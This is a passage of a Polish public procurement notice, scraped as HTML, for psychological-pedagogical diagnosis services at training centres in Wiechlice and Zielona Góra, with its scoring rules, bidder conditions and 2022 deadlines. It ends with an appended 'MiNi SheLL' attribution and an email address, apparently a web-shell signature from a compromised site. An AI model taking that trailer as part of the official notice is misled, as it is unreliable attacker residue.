odrzuceniu.<br/>Za najkorzystniejszą w danej części postępowania zostanie uznana oferta Wykonawcy, który spełni wszystkie postawione w SWZ warunki oraz uzyska największą liczbę punktów w oparciu o podane kryteria.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe osób przeprowadzających diagnozę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest przeprowadzenie diagnozy psychologiczno-pedagogicznej dla nowoprzyjętych uczestników stacjonarnych w OSiW w Wiechlicach<br/><br/>Orientacyjna liczba nowoprzyjętych uczestników w poszczególnych Ośrodkach:<br/> w Ośrodku Szkolenia i Wychowania w Wiechlicach - 25 osób (+/- 20%)<br/><br/>Szczegółowy opis znajduje się w SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85121270-6 - Usługi psychiatryczne lub psychologiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">98 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty w każdej z części postępowania, Zamawiający stosować będzie następujące kryteria oceny ofert:<br/>Cena brutto zadania (C) –60%<br/>Doświadczenie zawodowe osób przeprowadzających diagnozę (D) – 40%<br/><br/>Ocena kryterium „C” zostanie dokonana na podstawie informacji zamieszczonej w Formularzu „Oferta” przy zastosowaniu wzoru:<br/><br/>C = Cmin / Cof x 60 <br/><br/>gdzie:<br/>Cmin – najniższa cena brutto spośród ocenianych ofert,<br/>Cof – cena brutto badanej ofercie<br/><br/>Ocena kryterium Doświadczenie zawodowe osób przeprowadzających diagnozę „D” zostanie dokonana na podstawie zadeklarowanego przez Wykonawcę w Karcie oceny ofert (załącznik nr 2.2.) doświadczenia zawodowego osób przeprowadzających diagnozę:<br/><br/>Pełne lata doświadczenia zawodowego osoby/osób przeprowadzających diagnozę	Ilość otrzymanych punktów<br/>1 rok	0,00 pkt.<br/>2-3 lata	20,00 pkt.<br/>4-5 lata	30,00 pkt.<br/>6 lat i więcej 40,00 pkt.<br/><br/>W przypadku gdy w Karcie oceny ofert będzie wskazana jedna osoba, która będzie realizować zadanie w danej części postępowania (przeprowadzać diagnozę), punkty zostaną przyznane wg powyższej tabeli.<br/>W przypadku wskazania do realizacji zadania w danej części postępowania więcej niż jednej osoby, przy ocenie doświadczenia zawodowego Zamawiający weźmie pod uwagę średnią arytmetyczną doświadczenia wszystkich wskazanych osób i przyzna punkty na podstawie średniej liczby lat doświadczenia.<br/>Wykonawca może otrzymać w tym kryterium maksymalnie 40,00 pkt.<br/>W przypadku braku Karty oceny ofert lub braku wskazania w Karcie oceny ofert osoby/osób, które będą realizować zadanie w danej części postępowania, Karta oceny ofert nie będzie podlegać uzupełnieniu, a Wykonawca otrzyma w tym kryterium 0,00 pkt.<br/>W przypadku wskazania osoby posiadającej mniejsze niż wymagane roczne doświadczenie zawodowe, oferta będzie podlegała odrzuceniu, ze względu na niespełnienie warunku udziału w postępowaniu.<br/><br/>W przypadku, gdy Wykonawca nie wskaże w Karcie oceny ofert doświadczenia osób które będą realizować zadanie w danej części postępowania, informacje te nie będą podlegały uzupełnieniu, a Zamawiający uzna, iż wskazana osoba posiada wymagane roczne doświadczenie zawodowe i przyzna w tym kryterium oceny ofert 0,00 pkt.<br/><br/>Ostateczna ocena każdej oferty zostanie dokonana z dokładnością do dwóch miejsc po przecinku z zachowaniem zasady zaokrągleń matematycznych, na podstawie wzoru:<br/>OC = C + D <br/><br/>Ocenie będą podlegały wyłącznie oferty niepodlegające odrzuceniu.<br/>Za najkorzystniejszą w danej części postępowania zostanie uznana oferta Wykonawcy, który spełni wszystkie postawione w SWZ warunki oraz uzyska największą liczbę punktów w oparciu o podane kryteria.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe osób przeprowadzających diagnozę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest przeprowadzenie diagnozy psychologiczno-pedagogicznej dla nowoprzyjętych uczestników stacjonarnych w OSiW w Zielonej Górze<br/><br/>Orientacyjna liczba nowoprzyjętych uczestników w poszczególnych Ośrodkach:<br/>w Ośrodku Szkolenia i Wychowania w Zielonej Górze - 25 osób (+/- 20%)<br/><br/>Szczegółowy opis znajduje się w SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85121270-6 - Usługi psychiatryczne lub psychologiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">98 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty w każdej z części postępowania, Zamawiający stosować będzie następujące kryteria oceny ofert:<br/>Cena brutto zadania (C) –60%<br/>Doświadczenie zawodowe osób przeprowadzających diagnozę (D) – 40%<br/><br/>Ocena kryterium „C” zostanie dokonana na podstawie informacji zamieszczonej w Formularzu „Oferta” przy zastosowaniu wzoru:<br/><br/>C = Cmin / Cof x 60 <br/><br/>gdzie:<br/>Cmin – najniższa cena brutto spośród ocenianych ofert,<br/>Cof – cena brutto badanej ofercie<br/><br/>Ocena kryterium Doświadczenie zawodowe osób przeprowadzających diagnozę „D” zostanie dokonana na podstawie zadeklarowanego przez Wykonawcę w Karcie oceny ofert (załącznik nr 2.2.) doświadczenia zawodowego osób przeprowadzających diagnozę:<br/><br/>Pełne lata doświadczenia zawodowego osoby/osób przeprowadzających diagnozę	Ilość otrzymanych punktów<br/>1 rok	0,00 pkt.<br/>2-3 lata	20,00 pkt.<br/>4-5 lata	30,00 pkt.<br/>6 lat i więcej 40,00 pkt.<br/><br/>W przypadku gdy w Karcie oceny ofert będzie wskazana jedna osoba, która będzie realizować zadanie w danej części postępowania (przeprowadzać diagnozę), punkty zostaną przyznane wg powyższej tabeli.<br/>W przypadku wskazania do realizacji zadania w danej części postępowania więcej niż jednej osoby, przy ocenie doświadczenia zawodowego Zamawiający weźmie pod uwagę średnią arytmetyczną doświadczenia wszystkich wskazanych osób i przyzna punkty na podstawie średniej liczby lat doświadczenia.<br/>Wykonawca może otrzymać w tym kryterium maksymalnie 40,00 pkt.<br/>W przypadku braku Karty oceny ofert lub braku wskazania w Karcie oceny ofert osoby/osób, które będą realizować zadanie w danej części postępowania, Karta oceny ofert nie będzie podlegać uzupełnieniu, a Wykonawca otrzyma w tym kryterium 0,00 pkt.<br/>W przypadku wskazania osoby posiadającej mniejsze niż wymagane roczne doświadczenie zawodowe, oferta będzie podlegała odrzuceniu, ze względu na niespełnienie warunku udziału w postępowaniu.<br/><br/>W przypadku, gdy Wykonawca nie wskaże w Karcie oceny ofert doświadczenia osób które będą realizować zadanie w danej części postępowania, informacje te nie będą podlegały uzupełnieniu, a Zamawiający uzna, iż wskazana osoba posiada wymagane roczne doświadczenie zawodowe i przyzna w tym kryterium oceny ofert 0,00 pkt.<br/><br/>Ostateczna ocena każdej oferty zostanie dokonana z dokładnością do dwóch miejsc po przecinku z zachowaniem zasady zaokrągleń matematycznych, na podstawie wzoru:<br/>OC = C + D <br/><br/>Ocenie będą podlegały wyłącznie oferty niepodlegające odrzuceniu.<br/>Za najkorzystniejszą w danej części postępowania zostanie uznana oferta Wykonawcy, który spełni wszystkie postawione w SWZ warunki oraz uzyska największą liczbę punktów w oparciu o podane kryteria.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe osób przeprowadzających diagnozę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają określone przez zamawiającego warunki udziału w postępowaniu.<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym<br/>Nie dotyczy<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Nie dotyczy<br/>1)	sytuacji ekonomicznej lub finansowej:<br/>Nie dotyczy<br/>4)	zdolności technicznej lub zawodowej – dysponowanie osobami:<br/>Wykonawca musi dysponować psychologiem, który:<br/>- ukończył studia magisterskie o kierunku psychologia, <br/>- posiada minimum roczne doświadczenie zawodowe w świadczeniu usług psychologa. <br/>Przy realizacji diagnozy pogłębionej psycholog musi posiadać dodatkowo uprawnienia do wykonywania testów klinicznych.<br/>Spełnianie warunku udziału w postępowaniu może wykazać dowolny z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/><br/>Oceniając zdolność techniczną lub zawodową, zamawiający może, na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie będzie żądał podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie będzie żądał podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Przesłanki umożliwiające dokonanie zmian postanowień umowy zawartej z wybranym wykonawcą zawierają projektowane<br/>postanowienia umowy w Załączniku nr II.3 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-28 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com